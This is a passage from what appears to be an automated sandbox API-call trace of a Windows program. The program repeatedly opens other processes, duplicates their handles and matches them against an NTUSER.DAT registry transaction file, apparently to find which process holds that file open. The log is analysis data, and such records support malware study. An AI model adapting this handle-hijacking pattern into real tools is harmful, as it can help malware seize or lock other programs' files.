lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.108] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.108] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.108] CloseHandle (hObject=0x1e4) returned 1 [0165.108] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.108] CloseHandle (hObject=0x194) returned 1 [0165.109] CloseHandle (hObject=0x1e8) returned 1 [0165.109] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x970) returned 0x1e8 [0165.109] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.109] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.110] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.110] CloseHandle (hObject=0x1e4) returned 1 [0165.110] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.110] CloseHandle (hObject=0x194) returned 1 [0165.111] CloseHandle (hObject=0x1e8) returned 1 [0165.111] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x970) returned 0x1e8 [0165.111] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.111] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.112] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.112] CloseHandle (hObject=0x1e4) returned 1 [0165.112] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.113] CloseHandle (hObject=0x194) returned 1 [0165.113] CloseHandle (hObject=0x1e8) returned 1 [0165.113] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x980) returned 0x1e8 [0165.113] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.113] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.113] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.114] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.114] CloseHandle (hObject=0x1e4) returned 1 [0165.114] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.114] CloseHandle (hObject=0x194) returned 1 [0165.114] CloseHandle (hObject=0x1e8) returned 1 [0165.115] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x980) returned 0x1e8 [0165.115] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.115] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.115] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.116] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.116] CloseHandle (hObject=0x1e4) returned 1 [0165.116] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.116] CloseHandle (hObject=0x194) returned 1 [0165.116] CloseHandle (hObject=0x1e8) returned 1 [0165.116] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x990) returned 0x1e8 [0165.116] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.117] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.118] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.118] CloseHandle (hObject=0x1e4) returned 1 [0165.118] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.118] CloseHandle (hObject=0x194) returned 1 [0165.118] CloseHandle (hObject=0x1e8) returned 1 [0165.118] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x990) returned 0x1e8 [0165.118] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.119] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.120] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.120] CloseHandle (hObject=0x1e4) returned 1 [0165.120] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.120] CloseHandle (hObject=0x194) returned 1 [0165.120] CloseHandle (hObject=0x1e8) returned 1 [0165.120] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a0) returned 0x1e8 [0165.120] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.121] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.122] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.122] CloseHandle (hObject=0x1e4) returned 1 [0165.122] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.122] CloseHandle (hObject=0x194) returned 1 [0165.122] CloseHandle (hObject=0x1e8) returned 1 [0165.122] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a0) returned 0x1e8 [0165.122] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.123] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.124] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.124] CloseHandle (hObject=0x1e4) returned 1 [0165.124] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0165.124] CloseHandle (hObject=0x194) returned 1 [0165.124] CloseHandle (hObject=0x1e8) returned 1 [0165.124] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b0) returned 0x1e8 [0165.124] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.124] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.125] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.126] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.126] CloseHandle (hObject=0x1e4) returned 1 [0165.126] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.126] CloseHandle (hObject=0x194) returned 1 [0165.126] CloseHandle (hObject=0x1e8) returned 1 [0165.126] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b0) returned 0x1e8 [0165.126] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.127] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.128] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.128] CloseHandle (hObject=0x1e4) returned 1 [0165.128] _wcsicmp (_Str1="\\Adobe", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0165.128] CloseHandle (hObject=0x194) returned 1 [0165.128] CloseHandle (hObject=0x1e8) returned 1 [0165.128] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9c0) returned 0x1e8 [0165.128] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.129] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.130] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.130] CloseHandle (hObject=0x1e4) returned 1 [0165.130] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.130] CloseHandle (hObject=0x194) returned 1 [0165.130] CloseHandle (hObject=0x1e8) returned 1 [0165.130] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9c0) returned 0x1e8 [0165.130] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.131] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.132] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.132] CloseHandle (hObject=0x1e4) returned 1 [0165.132] _wcsicmp (_Str1="\\Microsoft SQL Server Compact Edition", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.132] CloseHandle (hObject=0x194) returned 1 [0165.132] CloseHandle (hObject=0x1e8) returned 1 [0165.132] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0165.132] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.133] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.134] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.134] CloseHandle (hObject=0x1e4) returned 1 [0165.134] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.134] CloseHandle (hObject=0x194) returned 1 [0165.134] CloseHandle (hObject=0x1e8) returned 1 [0165.134] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0165.134] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.135] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.136] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.136] CloseHandle (hObject=0x1e4) returned 1 [0165.136] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.136] CloseHandle (hObject=0x194) returned 1 [0165.136] CloseHandle (hObject=0x1e8) returned 1 [0165.137] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0165.137] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.137] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.138] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.138] CloseHandle (hObject=0x1e4) returned 1 [0165.138] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.138] CloseHandle (hObject=0x194) returned 1 [0165.138] CloseHandle (hObject=0x1e8) returned 1 [0165.138] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0165.138] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.138] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.139] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.140] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.140] CloseHandle (hObject=0x1e4) returned 1 [0165.140] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.140] CloseHandle (hObject=0x194) returned 1 [0165.140] CloseHandle (hObject=0x1e8) returned 1 [0165.140] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0165.140] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.140] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.141] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.142] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.142] CloseHandle (hObject=0x1e4) returned 1 [0165.142] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.142] CloseHandle (hObject=0x194) returned 1 [0165.142] CloseHandle (hObject=0x1e8) returned 1 [0165.142] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0165.142] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.143] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.144] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.144] CloseHandle (hObject=0x1e4) returned 1 [0165.144] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.144] CloseHandle (hObject=0x194) returned 1 [0165.144] CloseHandle (hObject=0x1e8) returned 1 [0165.144] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0165.144] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.144] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.145] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.145] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.146] CloseHandle (hObject=0x1e4) returned 1 [0165.146] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.146] CloseHandle (hObject=0x194) returned 1 [0165.146] CloseHandle (hObject=0x1e8) returned 1 [0165.146] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0165.146] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.146] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.147] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.147] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.148] CloseHandle (hObject=0x1e4) returned 1 [0165.148] CloseHandle (hObject=0x194) returned 1 [0165.148] CloseHandle (hObject=0x1e8) returned 1 [0165.148] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0165.148] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.148] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.149] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.149] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.149] CloseHandle (hObject=0x1e4) returned 1 [0165.149] CloseHandle (hObject=0x194) returned 1 [0165.149] CloseHandle (hObject=0x1e8) returned 1 [0165.150] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0165.150] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.150] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.151] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.152] CloseHandle (hObject=0x1e4) returned 1 [0165.152] CloseHandle (hObject=0x194) returned 1 [0165.152] CloseHandle (hObject=0x1e8) returned 1 [0165.152] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0165.152] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.152] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.153] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.153] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.154] CloseHandle (hObject=0x1e4) returned 1 [0165.154] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.154] CloseHandle (hObject=0x194) returned 1 [0165.154] CloseHandle (hObject=0x1e8) returned 1 [0165.154] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0165.154] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.155] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.156] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.156] CloseHandle (hObject=0x1e4) returned 1 [0165.156] CloseHandle (hObject=0x194) returned 1 [0165.156] CloseHandle (hObject=0x1e8) returned 1 [0165.156] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0165.156] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.156] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 